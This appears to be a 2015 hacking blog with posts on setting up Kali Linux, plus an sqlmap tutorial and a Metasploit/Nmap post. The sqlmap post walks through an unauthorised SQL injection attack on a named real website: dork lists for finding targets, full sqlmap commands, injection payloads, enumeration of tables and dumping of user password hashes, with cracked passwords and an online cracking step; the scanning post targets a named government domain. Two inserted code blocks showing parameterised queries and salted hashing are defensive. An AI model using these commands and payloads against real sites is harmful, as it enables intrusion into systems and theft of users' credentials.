Tuesday, December 15, 2015

How to Install VMware tools - Kali linux


Hello Guyz !

I am Afghan Assassin .
I have made a tutorial about how you can install Kali on VirtualBox, and it is the same in VMware. Many of you may have installed it already, but maybe you asked yourself: why is the screen so small? Or why can't I copy or move files from my computer to the virtual machine?

So in this tutorial we are going to install VMware Tools on Kali Linux, so that we will be able to use the real version of Kali.

So lets start :

Start your Kali Linux and look at the menu. There you can find "VM"; click on it and new options will appear. Just find "Install VMware Tools" and select it, and that is done.

You will see "Install vmware tools" on your Desktop.

Open it and you will see VMware Tools. It is a tar.gz archive, so just copy it and paste it in your home folder.

Now go to terminal and type ls

You will see your vmware folder name and its version and blah blah :D

So now we are going to install vmware tools

Open your terminal and start typing commands

tar -xvf VMwareTools<><>.tar.gz (enter)

This is my example; to install it yourself, you need to type your own VMware Tools file name and version ...

Now type ls

Now you will see something new with the name "vmware-tools-distrib"

Now type cd vmware-tools-distrib

Now type ls

Now type chmod +x vmware-install.pl

Now clear it by typing clear and enter

Don't close your terminal

Now type ./vmware-install.pl

The default answer is chosen by pressing the ENTER key, so press it until it finishes .....

Contact me for more information

My official Facebook Account :
https://www.facebook.com/AfghanAssassin.official.1

or leave a comment to let me know :)

Good bye ...

Wednesday, December 9, 2015

Installing Kali-Linux On your virtualbox

Hello guyz!
I am Afghan Assassin, and because some of my friends asked how to install Kali Linux on VirtualBox or use it on a PC, today we are going to learn it.

As you all know, I am using Kali as my OS because it is the best OS for hacking and pen-testing, but many of my friends asked how we can install Kali in Windows.

Requirements :
A good PC with good RAM, Graphic, HDD
Internet connection


So in this case we are going to use VirtualBox.
You can download it from the link below:

https://www.virtualbox.org/wiki/Downloads

And download Kali linux from official Kali Linux website :
www.kali.org/downloads

Lets begin our installation

After downloading VirtualBox, open it. On the left side you can see the "New" option; click on it.

Now you have to set your machine name, type and version.
Now select the amount of base memory (RAM) to be allocated to the virtual machine.

After that, select the disk space.

Recommended is 8.00GB

After that a new window opens; just leave the default, VDI.
Leave the default option for the virtual disk storage details. Click on Next to continue.


After that, set the file location and size.

Click Create to finish.

We have just created the virtual machine, but now we need to install an OS on it, so let's begin our Kali Linux installation process :)

Open your VirtualBox; there you can see Start. Click on it now.

starting Kali...

Choose "Graphical install"
Now choose language
Select your location

Choose your keyboard type; here we use American English.

Now enter your host name.
Enter your domain name or leave it empty!

At the root password step, type the password for your OS.

Choose time zone

Choose your partitioning method; in this case we choose "Guided - use entire disk".

Select the disk to partition and continue.

Now for the partition scheme we use "All files in one partition".


After all of this, the next window will open. If you still don't want to partition, install, or write changes to the disk, you can cancel here very easily!

But in this case we are going to install Kali, so we click on Yes and continue.
Now it asks you about a network mirror; in this case we also choose Yes and continue.


Now skip the proxy setting by clicking on Continue.
You will be asked to install the GRUB boot loader to the master boot record.
Choose Yes and click on Continue.


Wait until the installation completes; then the system will reboot, and DONE.


Keep visiting for more tutorials

If anyone has any question about this post, please leave a comment to let me know :)


Good bye...

Tuesday, December 8, 2015

[Setting themes on Kali Linux]

 
Hello Guys!


I am Afghan Assassin and today I am going to teach downloading themes, installing themes in Kali Linux, and setting themes.

So lets start from downloading theme for kali

Go to below link :
http://gnome-look.org/

As you can see :




Now at left side just choose one of them

    GTK 1.x
    GTK 2.x
    GTK 3.x



Choose any theme you like and download it!

So now it is time to install themes.

Go to the directory where it was saved; to make it easier to follow, simply copy and paste it on your Desktop.

Now open your terminal and type

cd Desktop

Now you are in desktop directory which means you can open any file or program located in Desktop :)

Now we install theme

In the terminal, in the Desktop directory or whichever directory you saved it in, type

sudo tar -xvf yourfilename.tar.gz

and press ENTER.

Now it is extracted and you can see its folders on your Desktop.
Now let's move them to the themes directory.

Again open the Desktop directory in the terminal, and use this command:

mv yourfoldername /usr/share/themes/

DONE

So now we want to change our theme.

Go to Applications > System Tools > Preferences > Advanced Settings

As you can see :

Now go to the GTK+ theme option;
there you will find your installed themes.

Keep visiting for more tutorials!

Email me at : Hamedmh346@gmail.com

Good Bye...

Saturday, December 5, 2015

 SQLMAP
Hello Guys !
I am Afghan Assassin as you all know, and today I am going to teach =How to hack website with sqlmap in 5 min=

---------------------------------------------------------------------------------------------
Sometimes it will take more time! We use dorks for finding vulnerable MySQL websites. You can search for SQL dorks on Google; as an example, I use dorks like these:

news.php id=

inurl:staff_id=

inurl:newsitem.php?num=

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=



---------------------------------------------------------------------------------------------
So, you will get results like below image :



http://www.calidus.ro/en/news.php?id=2

To find out if this site is vulnerable to SQL injection, simply add an apostrophe at the end of the URL like this:
http://www.calidus.ro/en/news.php?id=2'

Now here you can see MYSQL ERROR :


Now for hacking it using sqlmap

Open your terminal:
Type :
---------------------------------------------------------------------------------------------
sqlmap -u http://www.calidus.ro/en/news.php?id=2 --dbs
---------------------------------------------------------------------------------------------
-u is for the website URL (remove the ' from the end of the URL), sqlmap starts the SQL attack, and --dbs lists the database names.

Then ENTER and you will see this :
---------------------------------------------------------------------------------------------
sqlmap -u http://www.calidus.ro/en/news.php?id=2 --dbs

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:50:59

[09:50:59] [INFO] resuming back-end DBMS 'mysql'
[09:50:59] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 7272=7272

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=2 AND (SELECT 8047 FROM(SELECT COUNT(*),CONCAT(0x7166787a71,(SELECT (CASE WHEN (8047=8047) THEN 1 ELSE 0 END)),0x71766c6371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: id=2 UNION ALL SELECT NULL,CONCAT(0x7166787a71,0x6e6e464c735355596b66,0x71766c6371),NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=2 AND SLEEP(5)
---
[09:51:00] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[09:51:00] [INFO] fetching database names
available databases [2]:
[*] caliduzb_calidussql
[*] information_schema

[09:51:00] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.calidus.ro'

[*] shutting down at 09:51:00



It is different on other sites; the difference is in the database names. Also, if sqlmap asks you questions like [Y,n], just choose the capital letter:
[Y,n] = Y
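What the apostrophe error and the boolean-based payload in the output above say about the application's query code, and how the code is fixed, shown as an added example that is not part of the original post. SQLite stands in for the MySQL back end, and the table contents, function names and the false-condition probe `7272=7273` are constructed for illustration:

```python
import re
import sqlite3

SELECT_NEWS = "SELECT id, title, body, author FROM news WHERE id = "

def make_db():
    """Constructed sample data; SQLite stands in for the MySQL back end."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT);"
        "INSERT INTO news VALUES (1, 'Opening hours', 'text', 'staff');"
        "INSERT INTO news VALUES (2, 'New prices', 'text', 'staff');"
    )
    return db

def news_vulnerable(db, raw_id):
    # The request text is pasted into the statement, so the database
    # parses it as SQL. This is the pattern behind the error on id=2'.
    return db.execute(SELECT_NEWS + raw_id).fetchall()

def news_hardened(db, raw_id):
    # 1) Reject anything that is not a plain integer id.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a positive integer")
    # 2) Bind the value: it travels as data and never reaches the SQL parser.
    return db.execute(SELECT_NEWS + "?", (int(raw_id),)).fetchall()

def outcome(handler, raw_id):
    """Summarise what a client would observe for one request."""
    db = make_db()
    try:
        rows = handler(db, raw_id)
    except sqlite3.Error:
        return "database error"   # the visible error the apostrophe triggers
    except ValueError:
        return "rejected"
    finally:
        db.close()
    return f"{len(rows)} row(s)"

# Inputs modelled on the page: the apostrophe check, the boolean-based
# payload from the sqlmap output, its false counterpart, and a UNION with
# the same four-column shape (SQLite syntax, constructed).
PROBES = [
    "2",
    "2'",
    "2 AND 7272=7272",
    "2 AND 7272=7273",
    "2 UNION ALL SELECT NULL,'marker',NULL,NULL",
]

if __name__ == "__main__":
    for probe in PROBES:
        print(f"{probe!r:46} vulnerable: {outcome(news_vulnerable, probe):15}"
              f" hardened: {outcome(news_hardened, probe)}")
```

With the concatenated query, the true and false conditions return different row counts, which is the signal a boolean-based blind test relies on; with validation and binding, every probe except the plain `2` is rejected before it reaches the database.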

Now it is time to attack the database to find tables and columns, then dump ...
Finding the tables of the database (dbs):
for that we use this command:
---------------------------------------------------------------------------------------------
sqlmap -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql --tables
---------------------------------------------------------------------------------------------
Your result should be... :

---------------------------------------------------------------------------------------------
sqlmap -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql --tables

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:55:01

[09:55:01] [INFO] resuming back-end DBMS 'mysql'
[09:55:02] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 7272=7272

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=2 AND (SELECT 8047 FROM(SELECT COUNT(*),CONCAT(0x7166787a71,(SELECT (CASE WHEN (8047=8047) THEN 1 ELSE 0 END)),0x71766c6371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: id=2 UNION ALL SELECT NULL,CONCAT(0x7166787a71,0x6e6e464c735355596b66,0x71766c6371),NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=2 AND SLEEP(5)
---
[09:55:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[09:55:03] [INFO] fetching tables for database: 'caliduzb_calidussql'
Database: caliduzb_calidussql
[50 tables]
+-------------------+
| about             |
| about_de          |
| about_en          |
| categories        |
| categories_de     |
| categories_en     |
| contact           |
| contact_de        |
| contact_en        |
| customers         |
| eco               |
| eco_de            |
| eco_en            |
| faq               |
| faq_de            |
| faq_en            |
| forum_answer      |
| forum_question    |
| galleries         |
| gallery           |
| gallery_de        |
| gallery_en        |
| gallery_images    |
| imp               |
| mission           |
| mission_de        |
| mission_en        |
| news              |
| news_de           |
| news_en           |
| pellets           |
| pellets_de        |
| pellets_en        |
| prices            |
| products          |
| products_de       |
| products_en       |
| projects          |
| projects_de       |
| projects_en       |
| special_offers    |
| special_offers_de |
| special_offers_en |
| support           |
| support_de        |
| support_en        |
| users             |
| vizion            |
| vizion_de         |
| vizion_en         |
+-------------------+

[09:55:03] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.calidus.ro'

[*] shutting down at 09:55:03


---------------------------------------------------------------------------------------------
As you can see, now we have information about the tables, so we have to find out about users, because that is all we need to hack it...
For that we use this command:
---------------------------------------------------------------------------------------------
sqlmap -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql -T users --columns
---------------------------------------------------------------------------------------------
Sometimes it is users and sometimes PRIVILEGES, and it may be something else; just search for it and use your brain a little :D

Now we have got info about users as well.

Your result should look like this:
---------------------------------------------------------------------------------------------
sqlmap -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql -T users --columns

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:01:47

[10:01:47] [INFO] resuming back-end DBMS 'mysql'
[10:01:47] [INFO] testing connection to the target URL
[10:01:48] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 7272=7272

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=2 AND (SELECT 8047 FROM(SELECT COUNT(*),CONCAT(0x7166787a71,(SELECT (CASE WHEN (8047=8047) THEN 1 ELSE 0 END)),0x71766c6371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: id=2 UNION ALL SELECT NULL,CONCAT(0x7166787a71,0x6e6e464c735355596b66,0x71766c6371),NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=2 AND SLEEP(5)
---
[10:01:48] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[10:01:48] [INFO] fetching columns for table 'users' in database 'caliduzb_calidussql'
Database: caliduzb_calidussql
Table: users
[11 columns]
+-----------------------+--------------+
| Column                | Type         |
+-----------------------+--------------+
| logcode               | varchar(100) |
| user_email            | varchar(100) |
| user_id               | mediumint(8) |
| user_last_confirm_key | varchar(40)  |
| user_lastvisit        | date         |
| user_new_privmsg      | tinyint(2)   |
| user_password         | varchar(40)  |
| user_regdate          | date         |
| user_type             | tinyint(2)   |
| username              | varchar(255) |
| username_clean        | varchar(255) |
+-----------------------+--------------+

[10:01:48] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.calidus.ro'

[*] shutting down at 10:01:48


---------------------------------------------------------------------------------------------
Now let's dump it, which means we can hack it now,
by using this command:

sqlmap -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql -T users -C user_id,user_password --dump

Your result should be :
---------------------------------------------------------------------------------------------
root@kali:~# sqlmap -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql -T users -C user_id,user_password --dump

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:05:55

[10:05:55] [INFO] resuming back-end DBMS 'mysql'
[10:05:55] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 7272=7272

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=2 AND (SELECT 8047 FROM(SELECT COUNT(*),CONCAT(0x7166787a71,(SELECT (CASE WHEN (8047=8047) THEN 1 ELSE 0 END)),0x71766c6371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: id=2 UNION ALL SELECT NULL,CONCAT(0x7166787a71,0x6e6e464c735355596b66,0x71766c6371),NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=2 AND SLEEP(5)
---
[10:05:57] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:05:57] [INFO] fetching columns 'user_id, user_password' for table 'users' in database 'caliduzb_calidussql'
[10:05:57] [INFO] fetching entries of column(s) 'user_id, user_password' for table 'users' in database 'caliduzb_calidussql'
[10:05:57] [INFO] analyzing table dump for possible password hashes
[10:05:57] [INFO] recognized possible password hashes in column 'user_password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[10:06:04] [INFO] using hash method 'md5_generic_passwd'
[10:06:04] [INFO] resuming password 'marjan' for hash '122f961db675f6a45b998594471a990b'
[10:06:04] [INFO] resuming password 'root' for hash '63a9f0ea7bb98050796b649e85481845'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>

---------------------------------------------------------------------------------------------
As you can see, it asks about the dictionary attack, so the default is pressing ENTER and waiting :D
Press ENTER
[10:07:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] n
[10:07:48] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[10:07:48] [INFO] starting 4 processes
[10:08:03] [INFO] postprocessing table dump                                                                                                                                   
Database: caliduzb_calidussql
Table: users
[3 entries]
+---------+-------------------------------------------+
| user_id | user_password                             |
+---------+-------------------------------------------+
| 1       | a0dbde9503e13437db0f854b0b72a73b          |
| 8       | 63a9f0ea7bb98050796b649e85481845 (root)   |
| 6       | 122f961db675f6a45b998594471a990b (marjan) |
+---------+-------------------------------------------+

[10:08:03] [INFO] table 'caliduzb_calidussql.users' dumped to CSV file '/usr/share/sqlmap/output/www.calidus.ro/dump/caliduzb_calidussql/users.csv'
[10:08:03] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.calidus.ro'

[*] shutting down at 10:08:03

---------------------------------------------------------------------------------------------
DONE, now we have got user and pass.
Two hashes are cracked, but one more remains.

Now we are going to crack this hash for free and online :)

Open your browser and search for :

https://hashkiller.co.uk/md5-decrypter.aspx

As you can see it :



Choose the hash that is not cracked yet, then copy and paste it there like this:
(fill the captcha)


Now it is done; you have found user and pass.
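The dump above shows why the cracking step took seconds: user_password holds unsalted MD5, so common passwords fall to a dictionary or an online lookup. The server-side fix, as an added example that is not part of the original post, is a per-user salted, slow hash, with legacy MD5 records upgraded at the next successful login. The record format, function names and iteration count are assumptions:

```python
import hashlib
import hmac
import secrets

ITERATIONS = 600_000          # assumed work factor; tune it to your hardware
PREFIX = "pbkdf2_sha256$"     # assumed record format: prefix$iters$salt$hash

def legacy_md5(password):
    """Scheme seen in the dump: unsalted MD5 hex stored in user_password."""
    return hashlib.md5(password.encode()).hexdigest()

def hash_password(password, iterations=ITERATIONS):
    """Salted PBKDF2-HMAC-SHA256; a fresh random salt for every record."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{PREFIX}{iterations}${salt.hex()}${dk.hex()}"

def verify_password(stored, password):
    """Check a password against either record format, in constant time."""
    if stored.startswith(PREFIX):
        _, iters, salt_hex, dk_hex = stored.split("$")
        candidate = hashlib.pbkdf2_hmac(
            "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
        return hmac.compare_digest(candidate, bytes.fromhex(dk_hex))
    # Legacy record: 32 hex characters of unsalted MD5.
    return hmac.compare_digest(legacy_md5(password), stored.lower())

def login(stored, password):
    """Return (ok, record_to_store). A legacy record that verifies is
    replaced with a salted one, so MD5 values disappear as users log in."""
    if not verify_password(stored, password):
        return False, stored
    if not stored.startswith(PREFIX):
        return True, hash_password(password)
    return True, stored

if __name__ == "__main__":
    # Same password, same MD5 for every user: one lookup breaks them all.
    print(legacy_md5("root"))
    # Salted records differ even for identical passwords.
    print(hash_password("root") != hash_password("root"))
    ok, upgraded = login(legacy_md5("root"), "root")
    print(ok, upgraded.split("$")[0])
```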

I hope you understood it correctly, and if you have any problem you can contact me or leave a comment :) In the next tutorials I will teach WAF & finding the admin panel.

Keep visiting sharing and LIKE!


My gmail :
hamedmh346@gmail.com

Good bye...
MSF Basics
Hello Guys!
I am Afghan Assassin as you all know, today i teach you "
I must say that I am a Linux user and share my knowledge about Linux, not MS Windows, so please, if you are reading and following my blog, delete your MS Windows and install Kali Linux.


1 : How to find IP address of a website
2 : How to find OS of website by its IP using Nmap
3 : Finding website ports

1) How to find any website IP address
Open your Kali Linux terminal and type "nslookup". nslookup is our command, and after it we type our site address. Remove http/https and just type, as an example:
nslookup www.afghangovernment.com


As you can see in below image :



2) How to find OS of website by its IP using Nmap


First we must know what Nmap is and what it can do.

Nmap
Nmap is one such tool. It sends seven crafted TCP/IP packets (called tests) and waits for the answer.
Just know that it can help us :D

To use Nmap, we need to start Metasploit, and to start Metasploit we need to start PostgreSQL.

To start PostgreSQL, open your terminal and type this command:

service postgresql start

And to start MSF (Metasploit Framework):

service metasploit start

Now we have to enter msfconsole; for that, type msfconsole in the terminal and be patient :D

After it starts it looks like this image :




Now in the msf command line type :
db_nmap
Now you are in nmap.

Now we want to find information about this IP address, 192.254.190.3. I found it using nslookup on www.afghangovernment.com (nslookup www.afghangovernment.com)
It's just an example! :D

type : db_nmap (IP address)

Now we want to find how many ports this website has.

For that, follow these steps.

After getting info about the IP address with db_nmap

Now type :
services -h
Then type :
services

Now you can see all open and filtered ports as example in below images :




This was just one part of exploiting a website with Metasploit; I will teach more about it in the future.
Share, Comment, and like it if you want :)


My contact address :
My Gmail:
hamedmh346@gmail.com
My FB:
https://www.facebook.com/AfghanAssassin.official.1


Keep visiting for tutorials

Enjoy!

Good bye.